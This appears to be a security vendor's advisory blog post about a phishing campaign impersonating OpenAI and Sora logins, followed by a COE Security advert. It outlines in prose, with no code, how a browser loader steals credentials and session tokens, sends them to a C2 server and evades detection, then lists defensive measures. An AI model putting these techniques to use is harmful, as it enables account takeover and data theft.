A recent phishing campaign is exploiting users’ trust in popular AI services by impersonating OpenAI and the new Sora portals. Attackers send convincing account alerts that direct recipients to fake login pages. Once credentials are entered, a stealthy JavaScript loader runs inside the browser, captures the credentials, exfiltrates them to a command-and-control server, then redirects the user to the real service to avoid detection. Security teams first noticed the activity after organizations reported unusual logins tied to employees who had clicked through these messages.
This is a textbook example of modern phishing: high-fidelity impersonation, dynamic payload delivery, and post-compromise stealth that favors persistence and lateral movement.
What the attack looks like in practice
- Emails warn of account suspension or unusual activity and include links to forged OpenAI and Sora login pages.
- The fake pages mimic look and feel, and even use valid SSL certificates to appear legitimate.
- When credentials are submitted, obfuscated JavaScript fetches a secondary payload from an attacker-controlled endpoint and executes it in the browser.
- The injected payload captures usernames, passwords, and session tokens, forwards them to a C2 server, and then redirects the user to the legitimate service so the interaction appears normal.
- Persistence is enforced via browser local storage and session restoration techniques, so clearing cookies may not remove the infection.
Why this is dangerous for enterprises
Stolen credentials and tokens are powerful. In environments that rely on Single Sign-On, a single compromised token can grant access across multiple applications, enabling lateral movement, data exfiltration, model tampering, or the insertion of malicious prompts and scripts into AI workflows. The campaign’s use of dynamic loaders and in-browser execution makes signature-based detection less effective and increases the risk that breaches go unnoticed for longer.
Practical steps security teams should take now
- Review recent authentication logs for anomalous logins, geographies, or new device patterns.
- Enforce phishing-resistant multi-factor authentication, such as hardware tokens or FIDO2, for sensitive accounts.
- Harden SSO trust relationships and reduce token lifetimes where possible.
- Monitor outbound traffic from endpoints and browsers to detect calls to suspicious domains or unknown API endpoints.
- Implement browser protection controls that block or sandbox untrusted script execution and detect suspicious use of local storage for persistence.
- Run targeted phishing simulations and user training focused on high-fidelity service impersonation.
- Add detection hunts for obfuscated loader patterns and known artifact indicators, including embedded C2 URLs, base64-encoded fetch calls, and unusual eval usage in web contexts.
- Treat email-based alerts and in-app notifications as a potential attack surface and validate important links by hovering, verifying domains, or using centralized corporate portals instead of direct links.
Conclusion
This campaign highlights two realities: first, attackers will impersonate high-trust brands associated with innovation to increase click-through rates; second, browser-based loaders and token theft are now a primary path for enterprise compromise. Defenders need to treat collaboration platforms, SSO, and browser runtime behavior as first-class parts of the attack surface. Prevention must be layered – combining phishing-resistant MFA, telemetry-driven detection, strict token governance, and human-focused training – because once credentials are stolen, the ability to detect and contain damage determines the outcome.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
Additionally, based on threats like credential-harvesting phishing that target AI platforms and SSO, we provide:
- SSO and token governance assessments to limit lateral movement risk
- Browser runtime monitoring and artifact-hunting for in-browser loaders and obfuscated scripts
- Phishing simulation programs focused on high-fidelity brand impersonation and AI service lures
- Incident response playbooks for token theft and session compromise, including rapid token revocation and session invalidation
Follow COE Security on LinkedIn for ongoing insights into safe, compliant AI adoption and to stay updated and cyber safe.